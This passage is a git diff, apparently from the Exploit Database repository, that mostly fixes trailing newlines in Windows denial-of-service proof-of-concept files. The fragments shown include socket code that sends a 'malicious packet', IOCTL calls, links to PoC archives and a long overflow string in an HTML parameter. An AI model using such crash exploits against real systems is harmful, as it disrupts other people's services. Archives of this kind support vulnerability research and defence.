DeviceIoControl(hDevice, ioctl, (LPVOID)buff, inlen, (LPVOID)buff, outlen, &cb, NULL); free(buff); -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/15407.txt b/platforms/windows/dos/15407.txt index 5e446fe4e..ce90a5151 100755 --- a/platforms/windows/dos/15407.txt +++ b/platforms/windows/dos/15407.txt @@ -121,4 +121,4 @@ Followup: MachineOwner 3.Proof of concept is in poc.zip file. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15407.zip (poc.zip) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15407.zip (poc.zip) \ No newline at end of file diff --git a/platforms/windows/dos/15420.c b/platforms/windows/dos/15420.c index da17c4ae2..ec3ed22ec 100755 --- a/platforms/windows/dos/15420.c +++ b/platforms/windows/dos/15420.c @@ -63,4 +63,4 @@ outlen, &cb, NULL); free(buff); printf("done!"); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/15422.pl b/platforms/windows/dos/15422.pl index 9c0ca31f3..e99ca3ffd 100755 --- a/platforms/windows/dos/15422.pl +++ b/platforms/windows/dos/15422.pl @@ -22,4 +22,4 @@ $sock = IO::Socket::INET->new(Proto=>'tcp', PeerHost=>$target, PeerPort=>$port) $sock->send($payload); -close($sock); +close($sock); \ No newline at end of file diff --git a/platforms/windows/dos/15426.txt b/platforms/windows/dos/15426.txt index 1e5b405bf..9a70ec4a3 100755 --- a/platforms/windows/dos/15426.txt +++ b/platforms/windows/dos/15426.txt @@ -58,5 +58,4 @@ short BranchOffset, value -305 BranchOffset is located @ E6h-E7h -PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15426.rar (adobe_flash_int_ovrflw_poc.rar) - +PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15426.rar (adobe_flash_int_ovrflw_poc.rar) \ No newline at end of file diff --git a/platforms/windows/dos/15429.txt b/platforms/windows/dos/15429.txt index 1dc0b485e..0e411e4ad 100755 --- a/platforms/windows/dos/15429.txt +++ b/platforms/windows/dos/15429.txt @@ -24,4 +24,4 @@ Arguments : by default its "{0}" change it to "{A}" and presse execute wi - + \ No newline at end of file diff --git a/platforms/windows/dos/15432.html b/platforms/windows/dos/15432.html index 805bb88ab..731b30996 100755 --- a/platforms/windows/dos/15432.html +++ b/platforms/windows/dos/15432.html @@ -384,5 +384,4 @@ Debug String Log -------------------------------------------------- HEAP[wscript.exe]: -Heap block at 02A71EF0 modified at 02A720E4 past requested size of 1ec - +Heap block at 02A71EF0 modified at 02A720E4 past requested size of 1ec \ No newline at end of file diff --git a/platforms/windows/dos/15433.html b/platforms/windows/dos/15433.html index fbeb0f967..82025af28 100755 --- a/platforms/windows/dos/15433.html +++ b/platforms/windows/dos/15433.html @@ -208,5 +208,4 @@ ApiLog ***** Installing Hooks ***** 7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll) -7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll) - +7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll) \ No newline at end of file diff --git a/platforms/windows/dos/15434.html b/platforms/windows/dos/15434.html index 555493765..f5e04252d 100755 --- a/platforms/windows/dos/15434.html +++ b/platforms/windows/dos/15434.html @@ -86,4 +86,4 @@ ApiLog ***** Installing Hooks ***** 7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll) -7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll) +7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll) \ No newline at end of file diff --git a/platforms/windows/dos/15435.html b/platforms/windows/dos/15435.html index 0ad5c6411..6efcafe91 100755 --- a/platforms/windows/dos/15435.html +++ b/platforms/windows/dos/15435.html @@ -204,4 +204,4 @@ ApiLog ***** Installing Hooks ***** 7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll) -7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll) +7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll) \ No newline at end of file diff --git a/platforms/windows/dos/15436.html b/platforms/windows/dos/15436.html index 6d013e6f9..f79169379 100755 --- a/platforms/windows/dos/15436.html +++ b/platforms/windows/dos/15436.html @@ -75,4 +75,4 @@ ApiLog ***** Installing Hooks ***** 7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll) -7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll) +7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll) \ No newline at end of file diff --git a/platforms/windows/dos/15458.txt b/platforms/windows/dos/15458.txt index 959f3ba00..37ae28444 100755 --- a/platforms/windows/dos/15458.txt +++ b/platforms/windows/dos/15458.txt @@ -31,4 +31,4 @@ file.close() print "File Is created" print "Press Any Key To Continue........." -raw_input() +raw_input() \ No newline at end of file diff --git a/platforms/windows/dos/1552.pl b/platforms/windows/dos/1552.pl index 397047a43..40a1fdd40 100755 --- a/platforms/windows/dos/1552.pl +++ b/platforms/windows/dos/1552.pl @@ -24,4 +24,4 @@ else { print "\n- XM Easy Personal FTP Server 4.2 - PoC Exploit\n- Using: $0 host\n"; } -# milw0rm.com [2006-03-04] +# milw0rm.com [2006-03-04] \ No newline at end of file diff --git a/platforms/windows/dos/1557.c b/platforms/windows/dos/1557.c index 42ae522e8..5f30c2a9b 100755 --- a/platforms/windows/dos/1557.c +++ b/platforms/windows/dos/1557.c @@ -215,4 +215,4 @@ u_int resolv(char *host) { } #endif -// milw0rm.com [2006-03-06] +// milw0rm.com [2006-03-06] \ No newline at end of file diff --git a/platforms/windows/dos/1558.c b/platforms/windows/dos/1558.c index 1d3f4c020..459cf812a 100755 --- a/platforms/windows/dos/1558.c +++ b/platforms/windows/dos/1558.c @@ -456,4 +456,4 @@ u_int resolv(char *host) { } #endif -// milw0rm.com [2006-03-06] +// milw0rm.com [2006-03-06] \ No newline at end of file diff --git a/platforms/windows/dos/15580.pl b/platforms/windows/dos/15580.pl index 947d54e13..4d404fe7d 100755 --- a/platforms/windows/dos/15580.pl +++ b/platforms/windows/dos/15580.pl @@ -105,4 +105,4 @@ print "\n\n[*] Creating $file playlist file...\n"; open nml, ">./$file" || die "\nCan't open $file: $!"; print nml $start.$traktor.$end; print "\n[.] File successfully buffered!\n\n"; -close nml; +close nml; \ No newline at end of file diff --git a/platforms/windows/dos/15582.pl b/platforms/windows/dos/15582.pl index 287b12e1a..68c804f65 100755 --- a/platforms/windows/dos/15582.pl +++ b/platforms/windows/dos/15582.pl @@ -253,4 +253,4 @@ int main(int argc, char *argv[]) printf("File %s created!\n", FN); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/15583.pl b/platforms/windows/dos/15583.pl index db30db489..f3ea20e50 100755 --- a/platforms/windows/dos/15583.pl +++ b/platforms/windows/dos/15583.pl @@ -172,4 +172,4 @@ print "\n\n[*] Creating $file file...\n"; open KSD, ">./$file" || die "\nCan't open $file: $!"; print KSD $head.$ound.$feet; print "\n[.] File successfully buffered!\n\n"; -close KSD; +close KSD; \ No newline at end of file diff --git a/platforms/windows/dos/1559.c b/platforms/windows/dos/1559.c index 433e856cb..c77ea2b3e 100755 --- a/platforms/windows/dos/1559.c +++ b/platforms/windows/dos/1559.c @@ -402,4 +402,4 @@ int timeout(int sock) { } #endif -// milw0rm.com [2006-03-06] +// milw0rm.com [2006-03-06] \ No newline at end of file diff --git a/platforms/windows/dos/1560.c b/platforms/windows/dos/1560.c index 938a36bea..26305b04c 100755 --- a/platforms/windows/dos/1560.c +++ b/platforms/windows/dos/1560.c @@ -253,4 +253,4 @@ char *myineta(u_int ip) { return(ipc); } -// milw0rm.com [2006-03-06] +// milw0rm.com [2006-03-06] \ No newline at end of file diff --git a/platforms/windows/dos/15635.py b/platforms/windows/dos/15635.py index 25c0cd338..f4ebe425e 100755 --- a/platforms/windows/dos/15635.py +++ b/platforms/windows/dos/15635.py @@ -17,5 +17,4 @@ try: f.close() print "[-] File created!\n" except: - print "[-] Error occured!\n" - + print "[-] Error occured!\n" \ No newline at end of file diff --git a/platforms/windows/dos/1564.c b/platforms/windows/dos/1564.c index e3c6ffe1d..1e6cffe40 100755 --- a/platforms/windows/dos/1564.c +++ b/platforms/windows/dos/1564.c @@ -593,4 +593,4 @@ u_int resolv(char *host) { } #endif -// milw0rm.com [2006-03-07] +// milw0rm.com [2006-03-07] \ No newline at end of file diff --git a/platforms/windows/dos/15649.pl b/platforms/windows/dos/15649.pl index bc5d7ce4f..40d899bdd 100755 --- a/platforms/windows/dos/15649.pl +++ b/platforms/windows/dos/15649.pl @@ -46,5 +46,4 @@ while(1) { print "[+] Sending malicious packet ...\n"; print $sock1 "$buf"; print "\n[x] Server crashed!\n"; -exit; - +exit; \ No newline at end of file diff --git a/platforms/windows/dos/15669.py b/platforms/windows/dos/15669.py index ba15736c1..0f3a45a5c 100755 --- a/platforms/windows/dos/15669.py +++ b/platforms/windows/dos/15669.py @@ -17,5 +17,4 @@ try: f.close() print "[-] File created!\n" except: - print "[-] Error occured!\n" - + print "[-] Error occured!\n" \ No newline at end of file diff --git a/platforms/windows/dos/15674.rb b/platforms/windows/dos/15674.rb index 157c75b71..bccc8b867 100755 --- a/platforms/windows/dos/15674.rb +++ b/platforms/windows/dos/15674.rb @@ -63,4 +63,4 @@ class Metasploit3 < Msf::Auxiliary udp_sock.put($stuff) disconnect_udp end -end +end \ No newline at end of file diff --git a/platforms/windows/dos/15694.txt b/platforms/windows/dos/15694.txt index 0f75657dc..87f781824 100755 --- a/platforms/windows/dos/15694.txt +++ b/platforms/windows/dos/15694.txt @@ -127,4 +127,4 @@ ApiLog ***** Installing Hooks ***** 7c826cab CreateFileA(C:\WINDOWS\system32\rsaenh.dll) -7c826cab CreateFileA(C:\WINDOWS\system32\rsaenh.dll) +7c826cab CreateFileA(C:\WINDOWS\system32\rsaenh.dll) \ No newline at end of file diff --git a/platforms/windows/dos/15695.txt b/platforms/windows/dos/15695.txt index f12f1994a..55539a82d 100755 --- a/platforms/windows/dos/15695.txt +++ b/platforms/windows/dos/15695.txt @@ -128,4 +128,4 @@ ApiLog ***** Installing Hooks ***** 7c826cab CreateFileA(C:\WINDOWS\system32\rsaenh.dll) -7c826cab CreateFileA(C:\WINDOWS\system32\rsaenh.dll) +7c826cab CreateFileA(C:\WINDOWS\system32\rsaenh.dll) \ No newline at end of file diff --git a/platforms/windows/dos/15698.html b/platforms/windows/dos/15698.html index 0a446def5..3f5956106 100755 --- a/platforms/windows/dos/15698.html +++ b/platforms/windows/dos/15698.html @@ -16,4 +16,4 @@ Flash 6: : https://github.com/offensive-security/ <PARAM NAME="_cx" VALUE="0xFFFFFFFF"> <PARAM NAME="_cy" VALUE="0XABCDABCD"> <PARAM NAME="AllowScriptAccess" VALUE="ThisiscompletelywrittentotheESIregisterANDEAXxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx